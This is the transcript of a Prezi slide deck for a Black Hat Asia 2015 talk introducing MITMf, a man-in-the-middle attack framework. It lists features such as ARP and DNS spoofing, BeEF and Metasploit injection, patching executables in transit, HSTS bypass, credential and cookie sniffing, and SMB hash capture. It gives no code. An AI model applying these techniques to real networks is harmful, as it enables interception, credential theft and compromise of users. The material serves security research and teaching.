Send the link below via email or IMCopy
Present to your audienceStart remote presentation
- Invited audience members will follow you as you navigate and present
- People invited to a presentation do not need a Prezi account
- This link expires 10 minutes after you close the presentation
- A maximum of 30 users can follow your presentation
- Learn more about this feature in our knowledge base article
MITMf BHASIA 2015
Transcript of MITMf BHASIA 2015
The swiss-army knife
for Man-In-The-Middle Attacks
Contributed to the Veil-Framework, Kali-Nethunter and more..
So why do we need another MITM tool?
Stuck in dependencie hell
Not really designed to be an attack platform
Good for MITM
Unreliable when modifying traffic
Not easily extendible
Out of date
Too low level
Never got this to work properly
GUI seems broken
Do we even need a GUI?
How did this get started?
I JUST WANT SOMETHING TO RELIABLY INJECT IFRAMES!!!!!
So I Google'd like there was no tomorrow until I came across this:
I feel your pain bro...
Created by Ben Schmidt (@_supernothing)
Buy him a drink!
For those wondering, it stands for: Super Effective Recorder of Gathered Inputs and Outputs
A modified version of Moxie Marlinspike's SSLstrip tool
Hooks core functions in SSLstrip to modify traffic
Extremely easy to extend and build upon
So problem solved right?
Well not really...
A lot of the plugins relied on external tools (e.g. Ettercap, Metasploit etc..)
Some plugins were very limited in their functionality and were a bit outdated
Lots of bugs to squash
Wierd name but sounds promising!
What I wanted out of it
No reliance on external tools
Verbosity and logging
Minimize dependencies as much as possible (I truly tried..)
BeEF and Metasploit integration via their respective API and RPC's
Learn from other projects mistakes!
Originally used Ettercap
Completely re-written, now uses Scapy
Added support for ICMP, ARP req, ARP rep, DHCP
Supports DNS tampering (DNS spoofing on steroids)
When DHCP spoofing can exploit the ShellShock vuln!
Written by @rubenthijssen (Thanks man!)
Replaces strings in HTML content
Injects a JS script to enumerate all browser plugins
Uses PluginDetect to precisely get the installed Java plugin version
Uses the BrowserProfiler plugin to enumerate the Java Plugin version
Connects to Metasploit using it's MSGRPC interface
Uses SpiderLabs msfrpc to facilitate communication with Metasploit, original code had a bug, fixed it, you can find it here
Automatically sets up correct exploits, and injects iframes to trigger them
Born out of frustration from using the beef_injection_framework
Automatically injects BeEF hooks
for interfacing with BeEF's RESTfulAPI
Fingerprints OS, Browser and runs modules specified in the config file
Let's pause for a moment too understand how cool this is
Huge shout-out to @midnite_runr
Uses BDFactory to transparently "patch" executables going over HTTP
You can check out BDFactory at:
The plugin uses code from BDFproxy:
Modified to work somewhat on mobile devices
Responder integration into MITMf brings the framework to a whole new level
NBTNS/LLMNR spoof , act a a WPAD rougue server and more!
Shout out to Laurent Gaffie for letting me do this!
Uses Leonardo Nve's technique for partially bypassing HSTS as demonstrated last year at BHAsia
(buy him a drink!)
App Cache Poison
Implements Krzysztof Kotowicz (@kkotowicz) response tampering attacks
Places web pages in browsers long-lasting HTML5 AppCache so that the browser will continue to receive the modified page even when no longer MITM'd
For the lulz
Flips images 180 degrees
Gahhh! Vodoo?? No...
Returns redirect to
DNS request gets intercepted and
is mirrored to
We then re-write all links to the alternate domain
Client continues in plain-text since browser has no HSTS setting for
A port of Dan McInerney's (@DanHMcInerney) Net-Creds script
Sniffs passwords, hashes and search engine queries
TCP Re-Assembly aware
Doesn't rely on ports for service identification
Currently supports: FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (all supported protocols like HTTP, SMB, LDAP etc..) and Kerberos
But Dude! I want some shells ! <3
I got you covered!
Injects anything you want into HMTL!
Looking into the crystal ball...
Evilgrade and Snarf integration
Actual SSL/TLS support
SSLsplit like functionality
MITM RDP connections (almost done)
More protocol level attacks (Yersinia)
More HSTS bypasses
Automatically stores captured cookies in a firefox profile ,uses code from Firelamb:
Alternatively can send the cookies to the "Mallory cookie injector" Browser Extension
Injects Iframes with UNC paths to evoke SMB challenge-response attempts